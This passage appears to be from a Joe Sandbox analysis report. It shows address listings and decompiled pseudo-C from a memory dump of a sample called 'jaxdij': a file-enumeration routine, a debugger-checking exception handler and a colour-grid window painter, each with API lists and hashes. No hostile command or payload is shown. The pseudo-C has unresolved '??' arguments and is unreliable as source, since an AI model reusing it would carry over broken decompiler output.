                                                                                                                          0x00241db6
                                                                                                                          0x00241e2e
                                                                                                                          0x00241e31
                                                                                                                          0x00241e35
                                                                                                                          0x00241e3a
                                                                                                                          0x00241e3d
                                                                                                                          0x00241ea7
                                                                                                                          0x00241e43
                                                                                                                          0x00241e46
                                                                                                                          0x00241e49
                                                                                                                          0x00241e4c
                                                                                                                          0x00241e4f
                                                                                                                          0x00241e70
                                                                                                                          0x00241e73
                                                                                                                          0x00241e77
                                                                                                                          0x00241e84
                                                                                                                          0x00241e8c
                                                                                                                          0x00241e90
                                                                                                                          0x00000000
                                                                                                                          0x00241e96
                                                                                                                          0x00241e96
                                                                                                                          0x00241e96
                                                                                                                          0x00241e55
                                                                                                                          0x00241e55
                                                                                                                          0x00241e55
                                                                                                                          0x00241e4f
                                                                                                                          0x00241dbc
                                                                                                                          0x00241dbf
                                                                                                                          0x00241dc2
                                                                                                                          0x00241dc5
                                                                                                                          0x00241dc8
                                                                                                                          0x00241de9
                                                                                                                          0x00241dec
                                                                                                                          0x00241df0
                                                                                                                          0x00241dfd
                                                                                                                          0x00241e03
                                                                                                                          0x00241e07
                                                                                                                          0x00000000
                                                                                                                          0x00241e0d
                                                                                                                          0x00241e0d
                                                                                                                          0x00241e0d
                                                                                                                          0x00241dce
                                                                                                                          0x00241dce
                                                                                                                          0x00241dce
                                                                                                                          0x00241dc8
                                                                                                                          0x00241d0f
                                                                                                                          0x00241d12
                                                                                                                          0x00241d15
                                                                                                                          0x00241d18
                                                                                                                          0x00241d1b
                                                                                                                          0x00241d3c
                                                                                                                          0x00241d3f
                                                                                                                          0x00241d43
                                                                                                                          0x00241d50
                                                                                                                          0x00241d53
                                                                                                                          0x00241d57
                                                                                                                          0x00241d6a
                                                                                                                          0x00241d6a
                                                                                                                          0x00241d71
                                                                                                                          0x00000000
                                                                                                                          0x00241d77
                                                                                                                          0x00241d7d
                                                                                                                          0x00241d80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241d80
                                                                                                                          0x00241d5d
                                                                                                                          0x00241d5d
                                                                                                                          0x00241d64
                                                                                                                          0x00241d86
                                                                                                                          0x00241d86
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241d64
                                                                                                                          0x00241d21
                                                                                                                          0x00241d21
                                                                                                                          0x00241d21
                                                                                                                          0x00241d1b
                                                                                                                          0x00241c62
                                                                                                                          0x00241c65
                                                                                                                          0x00241c68
                                                                                                                          0x00241c6b
                                                                                                                          0x00241c6e
                                                                                                                          0x00241c8f
                                                                                                                          0x00241c92
                                                                                                                          0x00241c96
                                                                                                                          0x00241ca3
                                                                                                                          0x00241ca6
                                                                                                                          0x00241caa
                                                                                                                          0x00241cbd
                                                                                                                          0x00241cbd
                                                                                                                          0x00241cc4
                                                                                                                          0x00000000
                                                                                                                          0x00241cca
                                                                                                                          0x00241cd0
                                                                                                                          0x00241cd3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241cd3
                                                                                                                          0x00241cb0
                                                                                                                          0x00241cb0
                                                                                                                          0x00241cb7
                                                                                                                          0x00241cd9
                                                                                                                          0x00241cd9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241cb7
                                                                                                                          0x00241c74
                                                                                                                          0x00241c74
                                                                                                                          0x00241c74
                                                                                                                          0x00241c6e
                                                                                                                          0x00241c1d
                                                                                                                          0x00241c1d
                                                                                                                          0x00241c27
                                                                                                                          0x00241c31
                                                                                                                          0x00000000
                                                                                                                          0x00241c31
                                                                                                                          0x00241bec
                                                                                                                          0x00241bec
                                                                                                                          0x00241eb3
                                                                                                                          0x00241eb9
                                                                                                                          0x00000000
                                                                                                                          0x00241eb9
                                                                                                                          0x00000000
                                                                                                                          0x00241be6
                                                                                                                          0x00241ec1
                                                                                                                          0x00241ec8
                                                                                                                          0x00241eda
                                                                                                                          0x00241ede
                                                                                                                          0x00241ee4
                                                                                                                          0x00241ee4
                                                                                                                          0x00241eeb
                                                                                                                          0x00241eef
                                                                                                                          0x00241ef5
                                                                                                                          0x00241ef5
                                                                                                                          0x00241f08
                                                                                                                          0x00241f0b
                                                                                                                          0x00241f13
                                                                                                                          0x00241f17
                                                                                                                          0x00241f1b
                                                                                                                          0x00241f20
                                                                                                                          0x00241f23
                                                                                                                          0x00241f28
                                                                                                                          0x00241f2b
                                                                                                                          0x00241f3d
                                                                                                                          0x00241f41
                                                                                                                          0x00241fe9
                                                                                                                          0x00241fec
                                                                                                                          0x00241ff1
                                                                                                                          0x00241ff4
                                                                                                                          0x00241ff7
                                                                                                                          0x0024200f
                                                                                                                          0x00242012
                                                                                                                          0x00242018
                                                                                                                          0x0024201e
                                                                                                                          0x00242021
                                                                                                                          0x00242032
                                                                                                                          0x00242035
                                                                                                                          0x00242039
                                                                                                                          0x0024203d
                                                                                                                          0x00242042
                                                                                                                          0x0024204b
                                                                                                                          0x0024204e
                                                                                                                          0x00242068
                                                                                                                          0x00242054
                                                                                                                          0x00242058
                                                                                                                          0x00242058
                                                                                                                          0x00242079
                                                                                                                          0x0024207f
                                                                                                                          0x00242082
                                                                                                                          0x00242086
                                                                                                                          0x0024208c
                                                                                                                          0x00000000
                                                                                                                          0x00241ffd
                                                                                                                          0x00241ffd
                                                                                                                          0x00241ffd
                                                                                                                          0x00241f47
                                                                                                                          0x00241f47
                                                                                                                          0x00241f4e
                                                                                                                          0x00241f54
                                                                                                                          0x00241f57
                                                                                                                          0x00241f5c
                                                                                                                          0x00241f63
                                                                                                                          0x00241f69
                                                                                                                          0x00241f6c
                                                                                                                          0x00241f71
                                                                                                                          0x00241f78
                                                                                                                          0x00241f8b
                                                                                                                          0x00241f91
                                                                                                                          0x00241f94
                                                                                                                          0x00241f99
                                                                                                                          0x00241f9c
                                                                                                                          0x00241fa3
                                                                                                                          0x00241fcf
                                                                                                                          0x00000000
                                                                                                                          0x00241fa9
                                                                                                                          0x00241faf
                                                                                                                          0x00241fb2
                                                                                                                          0x00241fb7
                                                                                                                          0x00241fba
                                                                                                                          0x00241fbd
                                                                                                                          0x00000000
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fbd
                                                                                                                          0x00241f7e
                                                                                                                          0x00241f7e
                                                                                                                          0x00241f85
                                                                                                                          0x00241fd4
                                                                                                                          0x00241fde
                                                                                                                          0x0024208f
                                                                                                                          0x00242098
                                                                                                                          0x0024209b
                                                                                                                          0x002420a7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241f85
                                                                                                                          0x00241f78
                                                                                                                          0x00241f31
                                                                                                                          0x00241f31
                                                                                                                          0x00241f31
                                                                                                                          0x00241ece
                                                                                                                          0x00241ece
                                                                                                                          0x00241ece
                                                                                                                          0x00241ba8
                                                                                                                          0x00241ba8
                                                                                                                          0x00241ba8
                                                                                                                          0x0024193f
                                                                                                                          0x0024193f
                                                                                                                          0x0024193f
                                                                                                                          0x002420aa
                                                                                                                          0x002420b6

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocCreateReadSizeVirtual
                                                                                                                          • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                                                                                                                          • API String ID: 4119528295-967118136
                                                                                                                          • Opcode ID: e434e9f0221c797e3a21bc9c59e184f8fda53a28748370c2b990eb0e62f06cbc
                                                                                                                          • Instruction ID: 96c38ac2c9d7e0e4e5c5e02ff8660d11ce6ce493286d0b5a4c47e07423946a25
                                                                                                                          • Opcode Fuzzy Hash: e434e9f0221c797e3a21bc9c59e184f8fda53a28748370c2b990eb0e62f06cbc
                                                                                                                          • Instruction Fuzzy Hash: 30324A70919208CFDB14EFA8D588BADBBF0FF48304F10845DE885A7291D7B599A9CF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00255387 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00255387(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0x264050; // 0xbb40e64e
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E002554FD( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E002554FD(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E002552D3(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E002580F0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00255521);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E002552D3(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E0024DB65(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                                                                                                                          0x00255392
                                                                                                                          0x00255399
                                                                                                                          0x0025539c
                                                                                                                          0x0025539f
                                                                                                                          0x002553a5
                                                                                                                          0x002553a8
                                                                                                                          0x002553b0
                                                                                                                          0x002553b2
                                                                                                                          0x002553c5
                                                                                                                          0x002553ca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002553ca
                                                                                                                          0x002553cc
                                                                                                                          0x002553cc
                                                                                                                          0x002553d2
                                                                                                                          0x002553d8
                                                                                                                          0x002553f4
                                                                                                                          0x002553f5
                                                                                                                          0x002553fb
                                                                                                                          0x00255407
                                                                                                                          0x0025540a
                                                                                                                          0x0025540c
                                                                                                                          0x00255413
                                                                                                                          0x00255428
                                                                                                                          0x0025542d
                                                                                                                          0x00255437
                                                                                                                          0x00255447
                                                                                                                          0x0025544d
                                                                                                                          0x0025544e
                                                                                                                          0x00255455
                                                                                                                          0x00255474
                                                                                                                          0x00255483
                                                                                                                          0x00255488
                                                                                                                          0x0025548b
                                                                                                                          0x00255493
                                                                                                                          0x002554e2
                                                                                                                          0x002554e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00255495
                                                                                                                          0x0025549d
                                                                                                                          0x002554a7
                                                                                                                          0x002554a7
                                                                                                                          0x002554ad
                                                                                                                          0x002554b1
                                                                                                                          0x002554b7
                                                                                                                          0x002554bc
                                                                                                                          0x002554d7
                                                                                                                          0x002554dc
                                                                                                                          0x002554bf
                                                                                                                          0x002554c5
                                                                                                                          0x0025542f
                                                                                                                          0x0025542f
                                                                                                                          0x00000000
                                                                                                                          0x0025542f
                                                                                                                          0x002553da
                                                                                                                          0x002553da
                                                                                                                          0x002553df
                                                                                                                          0x00000000
                                                                                                                          0x002553e1
                                                                                                                          0x002553e1
                                                                                                                          0x002553e2
                                                                                                                          0x002553e4
                                                                                                                          0x002553e7
                                                                                                                          0x002553ec
                                                                                                                          0x002553df
                                                                                                                          0x002554ee
                                                                                                                          0x002554fc

                                                                                                                          APIs
                                                                                                                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00255422
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0025549D
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002554BF
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002554E2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1164774033-0
                                                                                                                          • Opcode ID: 8165d26f870b9bb943cfcf0ba50a1a12fa2af3ff5df12d6c3ebc482ee0118ed8
                                                                                                                          • Instruction ID: 766f5faa58c8e3e31b3085383394be77153d35cd6b1af68f9aded7db5ac0205a
                                                                                                                          • Opcode Fuzzy Hash: 8165d26f870b9bb943cfcf0ba50a1a12fa2af3ff5df12d6c3ebc482ee0118ed8
                                                                                                                          • Instruction Fuzzy Hash: 2E41E57191093AAFDB20DF64DC989BAB378EF84347F1481D5E805D7140E7709EE88B58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024D76C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E0024D76C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0024D6E0(_t34);
				 *_t60 = 0x2cc;
				_v632 = E0024FC70(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E0024FC70(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0024D6E0(_t49);
				}
				return _t49;
			}


































                                                                                                                          0x0024d76c
                                                                                                                          0x0024d76c
                                                                                                                          0x0024d76c
                                                                                                                          0x0024d780
                                                                                                                          0x0024d782
                                                                                                                          0x0024d785
                                                                                                                          0x0024d785
                                                                                                                          0x0024d789
                                                                                                                          0x0024d78e
                                                                                                                          0x0024d7a6
                                                                                                                          0x0024d7ac
                                                                                                                          0x0024d7b2
                                                                                                                          0x0024d7b8
                                                                                                                          0x0024d7be
                                                                                                                          0x0024d7c4
                                                                                                                          0x0024d7ca
                                                                                                                          0x0024d7d1
                                                                                                                          0x0024d7d8
                                                                                                                          0x0024d7df
                                                                                                                          0x0024d7e6
                                                                                                                          0x0024d7ed
                                                                                                                          0x0024d7f4
                                                                                                                          0x0024d7f5
                                                                                                                          0x0024d7fe
                                                                                                                          0x0024d804
                                                                                                                          0x0024d807
                                                                                                                          0x0024d80d
                                                                                                                          0x0024d81c
                                                                                                                          0x0024d828
                                                                                                                          0x0024d833
                                                                                                                          0x0024d83a
                                                                                                                          0x0024d841
                                                                                                                          0x0024d84c
                                                                                                                          0x0024d854
                                                                                                                          0x0024d85d
                                                                                                                          0x0024d85f
                                                                                                                          0x0024d862
                                                                                                                          0x0024d864
                                                                                                                          0x0024d86e
                                                                                                                          0x0024d876
                                                                                                                          0x0024d87c
                                                                                                                          0x00000000
                                                                                                                          0x0024d883
                                                                                                                          0x0024d886

                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024D778
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0024D844
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024D864
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0024D86E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 254469556-0
                                                                                                                          • Opcode ID: 9f730e33953482ef4ac2f1aa2c726600f47f10b0ae4ec81473eda12b3ea2901e
                                                                                                                          • Instruction ID: 3de2f829fadfb232cfb405e4bdfa7017c82e6d320dfebf328ffa9cb86e07b259
                                                                                                                          • Opcode Fuzzy Hash: 9f730e33953482ef4ac2f1aa2c726600f47f10b0ae4ec81473eda12b3ea2901e
                                                                                                                          • Instruction Fuzzy Hash: 3B312775D5121D9BDB10DFA4D989BCDBBB8AF08304F1041EAE40DAB250EB709A95CF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024BF70 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E0024BF70(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                                                                                                                          0x0024bf86
                                                                                                                          0x0024bf89
                                                                                                                          0x0024bf92
                                                                                                                          0x0024bfc0
                                                                                                                          0x0024bfd6
                                                                                                                          0x0024bfe7
                                                                                                                          0x0024bfea
                                                                                                                          0x0024c007
                                                                                                                          0x0024c00d
                                                                                                                          0x0024c010
                                                                                                                          0x0024c013
                                                                                                                          0x0024c01a
                                                                                                                          0x0024c02c
                                                                                                                          0x0024c02f
                                                                                                                          0x0024c03d
                                                                                                                          0x0024c04b
                                                                                                                          0x0024c051
                                                                                                                          0x0024c05f
                                                                                                                          0x0024c06c
                                                                                                                          0x0024c079
                                                                                                                          0x0024c082
                                                                                                                          0x0024c092
                                                                                                                          0x0024c098
                                                                                                                          0x0024c09b
                                                                                                                          0x0024c0a7
                                                                                                                          0x0024c0aa
                                                                                                                          0x0024c0ae
                                                                                                                          0x0024c0b2
                                                                                                                          0x0024c0c1
                                                                                                                          0x0024c0da
                                                                                                                          0x0024c0e0
                                                                                                                          0x0024c0e6
                                                                                                                          0x0024c0ec
                                                                                                                          0x0024c10d
                                                                                                                          0x0024c113
                                                                                                                          0x0024c116
                                                                                                                          0x0024c11f
                                                                                                                          0x0024c128
                                                                                                                          0x0024c12b
                                                                                                                          0x0024c136
                                                                                                                          0x0024c139
                                                                                                                          0x0024c13d
                                                                                                                          0x0024c141
                                                                                                                          0x0024c149
                                                                                                                          0x0024c14f
                                                                                                                          0x0024c15b
                                                                                                                          0x0024c15e
                                                                                                                          0x0024c162
                                                                                                                          0x0024c166
                                                                                                                          0x0024c16c
                                                                                                                          0x0024c178
                                                                                                                          0x0024c17b
                                                                                                                          0x0024c17f
                                                                                                                          0x0024c183
                                                                                                                          0x0024c1a6
                                                                                                                          0x0024c1ac
                                                                                                                          0x0024c1b8
                                                                                                                          0x0024c1bb
                                                                                                                          0x0024c1bf
                                                                                                                          0x0024c1c3
                                                                                                                          0x0024c1c9
                                                                                                                          0x0024c1d5
                                                                                                                          0x0024c1d8
                                                                                                                          0x0024c1dc
                                                                                                                          0x0024c1e0
                                                                                                                          0x0024c1e6
                                                                                                                          0x0024c1ec
                                                                                                                          0x0024c1ef
                                                                                                                          0x0024c1f5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0024c206
                                                                                                                          0x0024c20f
                                                                                                                          0x0024c218
                                                                                                                          0x0024c221
                                                                                                                          0x0024c22b
                                                                                                                          0x0024c231
                                                                                                                          0x0024c237
                                                                                                                          0x0024c23a
                                                                                                                          0x0024c23e
                                                                                                                          0x0024c244
                                                                                                                          0x0024c244
                                                                                                                          0x0024c259
                                                                                                                          0x0024c25f
                                                                                                                          0x0024c25f
                                                                                                                          0x0024c26d
                                                                                                                          0x0024c26d
                                                                                                                          0x0024c282
                                                                                                                          0x00000000
                                                                                                                          0x0024bf98
                                                                                                                          0x0024bfa8
                                                                                                                          0x0024c2a0
                                                                                                                          0x0024c2b4
                                                                                                                          0x0024c2b7
                                                                                                                          0x0024c2cb
                                                                                                                          0x0024c2dc
                                                                                                                          0x0024c2f0
                                                                                                                          0x0024c2f3
                                                                                                                          0x0024c304
                                                                                                                          0x0024c311
                                                                                                                          0x0024c331
                                                                                                                          0x0024c372
                                                                                                                          0x0024c393
                                                                                                                          0x0024c3cd
                                                                                                                          0x0024c3cd
                                                                                                                          0x0024bfae
                                                                                                                          0x0024c3c5
                                                                                                                          0x0024c3c5
                                                                                                                          0x0024bfa8
                                                                                                                          0x0024c3df

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
